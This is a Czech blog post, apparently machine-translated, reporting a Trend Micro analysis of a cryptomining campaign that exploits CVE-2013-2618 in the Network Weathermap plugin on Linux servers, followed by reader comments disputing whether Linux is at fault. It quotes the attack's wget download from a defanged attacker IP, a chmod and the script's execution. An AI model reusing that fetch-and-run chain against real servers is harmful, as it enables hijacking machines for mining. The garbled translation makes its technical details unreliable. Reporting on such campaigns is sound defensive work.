To od těžař kryptoměn s využitím vzdálených počítačů bez povolení jejich vlastníků se stává trendem. Už jsem o tom několikrát hovořil zde na blogu o tomto typu situace.
A to je to, že se to už úplně vymklo kontrole od okamžiku, kdy kryptoměny zaujali docela značné místo a hodnotu, lidé s dostatečnými znalostmi pro přístup k počítačům, které narušují jejich bezpečnost, si nechali stranou plýtvání časem hledáním důležitých informací nebo bankovních účtů za účelem získání peněžní výhody.
Místo toho se rozhodnou pro nejjednodušší věc převzít kontrolu nad těmito týmy a spojit je v těžební síti a také pro další úkoly, které běžně dělají s botnetem.
Tímto způsobem je obvykle více přečíslovat vás, zaměřují se pouze na okamžité peníze, které to generuje.
Díky inteligentnímu pochopení tržních trendů a správné znalosti kryptoměnového obchodování lze těžit z velkých výhod.
Je Linux opravdu bezpečný systém?
Mnoho z nás má představu, že Linux je téměř dokonalý zabezpečený operační systém, realita je taková, že stále má určité nedostatky.
No máněkdy TrendMicro našel, ve kterém odhalil nový chyba v systémech Linux, která dala hackerům výhodu těžby kryptoměn pomocí serverů a strojů Linux.
V prohlášení prostřednictvím vašeho blogu komentovali následující:
Prostřednictvím našeho monitorování souvisejícího s reakcí na incidenty jsme sledovali pokusy o narušení, jejichž ukazatele jsme dokázali korelovat s předchozí kampaní na těžbu kryptoměny, která používala malware JenkinsMiner.
Rozdíl: Tato kampaň je zaměřena na servery Linux. Je to také klasický případ znovu použitých zranitelností využívajících zastaralou bezpečnostní chybu, jejíž oprava je k dispozici téměř pět let.
V tomto vydání prostřednictvím vaší analýzy podařilo identifikovat postižené stránky za toto selhání to Ovlivňuje hlavně Japonsko, Tchaj-wan, Čínu, USA a Indii.
Analýza útoku
Prostřednictvím analýzy by Trend Micro Smart Protection Network podrobně popište, jak útočníci využívají této chyby:
Provozovatelé této kampaně využívali CVE-2013-2618, datovanou chybu zabezpečení v pluginu Camapi Network Weathermap, který správci systému používají k vizualizaci síťové aktivity.
Co se týče toho, proč využívají starou bezpečnostní chybu: Network Weathermap má zatím pouze dvě veřejně hlášené chyby zabezpečení, obě od června 2014.
Tito útočníci možná využívají nejen bezpečnostní chybu, pro kterou je k dispozici zneužití, ale také zpoždění opravy, ke kterému dochází v organizacích využívajících nástroj open source.
V podstatě útok probíhá prostřednictvím útoku XSS:
Fuzzy část je cíl útoku, webový server s portem.
Soubor /plugins/weathermap/configs/conn.php je soubor, který je výsledkem trvalého útoku XSS na / plugins / weathermap / php .
Kromě conn.php Zpočátku vidíme podobný požadavek HTTP aplikovaný na stránku s názvem ' cools.php ".
Program těžby kryptoměny je distribuován prostřednictvím této chyby zabezpečení z mapy počasí PHP na cílech, kterými jsou servery Linux
Na obrázku vidíte, jak je útok generován a je popsán následovně:
wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh
Co dělá, je odeslat indikaci ke stažení souboru s wget, což je nástroj, který mají ve výchozím nastavení nainstalovány téměř všechny distribuce Linuxu.
chmod 775 watchd0g.sh
dělá soubor spustitelným
./watchd0g.sh
To, co nakonec dělá, je dostat soubor na server.
Naštěstí, již existuje oprava ( CVE-2013-2618 ) k dispozici pro selhání a Můžete si jej stáhnout z tento odkaz
Si chcete o tom vědět víc tohoto selhání můžete navštívit tento odkaz.
Být idiotem není bezpečné a přesto vás Linux zachrání.
Neaktualizace bezpečnostních oprav není chybou systému Linux. Je chybou, že některé společnosti, aby ušetřily peníze, najímaly idioty jako správce systému,
Ale i tak je to OKAMŽITĚ ZJIŠTĚNO a je okamžitě vyřešeno, dokonce i jakýkoli menší bezpečnostní incident, jako je tento, je zveřejněn.
A jakou chybu má Linux, že jeho aktualizace nejsou použity? Vývojáři GNU / Linux dělají svou práci tím, že vyvíjejí řešení vznikajících zranitelných míst a zpřístupňují je uživatelům. Pokud lékař předepíše vakcínu proti chřipce a nedostanete ji, onemocníte a ztuhnete ... je to chyba lékaře?
DesdeLinux Není to, co to bylo, dvě zprávy za sebou se dvěma důležitými chybami:
1. - Do lepších vývojových editorů vložili ten, který není svobodným softwarem, a zapomněli na ostatní, kteří jsou (jsou citováni v komentářích).
2. - Obrovská zpráva o virech, které se týkají pouze NON AKTUALIZOVANÝCH serverů. Ale pokud je nějaký linux ve výchozím nastavení aktualizován po celá desetiletí. Chcete-li se bát, jako byste potřebovali sající antivirus ve stylu Windows. Zdá se, že se snaží říci, že Linux je stejný jako Windows, a ne.
Pokud je chyba stará a již byla opravena, není to ani zpráva, ani nic. Nehrajte na společnosti Microsoft a antivirové společnosti, jako jsou Trend Micro, Norton, Panda nebo McAffee, ani nedostávejte výplaty.
Mimochodem, ve společnosti jsme několik let používali Trend Micro a byl to skutečný brambor, hovno, protože jeho systém říkal, že spustitelný soubor má „stopy“ virů (něco, co by mohl být virus, i když tomu tak nebylo) a proč odstranil to (vzal to do adresáře, aby se nespustil), což neumožňovalo jeho použití, a neměl žádný whitelist, který by toto chování odblokoval bezpečným spustitelným souborem, který jsme potřebovali použít. Takový nepořádek. Jednalo se o firemní verzi, individuální verze měla tuto možnost whitelistingu. Patetický.
Nepopisujte se tak elegantně.
Článek hovoří o bezpečnostní díře, která vám umožňuje vstoupit do programu, zajistit jeho spustitelnost a spustit jej, což je bezpečnostní díra, kterou se musí šířit každý virus. Je zřejmé, že jde o virus, který by potřeboval, aby zadaný program měl ve svém kódu možnost skenováním počítačů v síti opakujte operaci a vlastní kopírování. Nedělají to přesně proto, že v Linuxu jsou objevené bezpečnostní díry pokryty bezpečnostní opravou, a to myslím tím rozdílem mezi Windows a Linuxem, protože antivirus není nutný, ale zakrýt tuto díru. Ve Windows je to obtížnější z několika důvodů: 1.- Soubory se mohou stát spustitelnými jednoduše z důvodu jejich přípony, což eliminuje krok jejich zavedení na postiženém počítači. 2.- Uživatelé neustále instalují programy pochybného původu, protože jsou proprietární a potřebují je mít bez placení (neříkám nic, co by pro domácí ekonomiku bylo koupit MS Office, Photoshop, ... více než zdvojnásobit náklady na počítačové vybavení). 3.- Dříve nebo později systém Windows propláchne, uživatel jej přenese k sousedovi, příteli, ... který, aby neztrácel čas, vše naformátuje a nainstaluje Windows Ultimate s aktivační aktualizací, která není aktualizována, nebo která sama oprava špionážní program. Je možné, že to tak není a bude to skvělé, ale je možné, že to tak je a že Windows budou špionovat hesla. V článku zmiňují úvodní systém v linuxu zasažený touto chybou zabezpečení, takže nejjednodušší součástí všeho je program, který automaticky prohledá síť a použije ji ke kopírování a spuštění na serveru. v článku je nejdůležitější krok pro jakýkoli virus: znalost zranitelnosti systému vůči útoku.
Špatné informace. Toto není chyba v Linuxu, je to chyba v APLIKACI PHP, to znamená, že je multiplatformní. Není to exkluzivní pouze pro systémy s linuxovým jádrem! Ale i kdyby aplikace nebyla multiplatformní, nebyla by to chyba systému Linux, byla by to jen aplikace.
Linuxové jádro nemá sebemenší zásah do ochrany před útoky skriptování mezi weby, jako je tento. Před zveřejněním alespoň prozkoumejte PĚT MINUT, protože je pravda, že každému, kdo o něčem něco ví, budete vypadat špatně.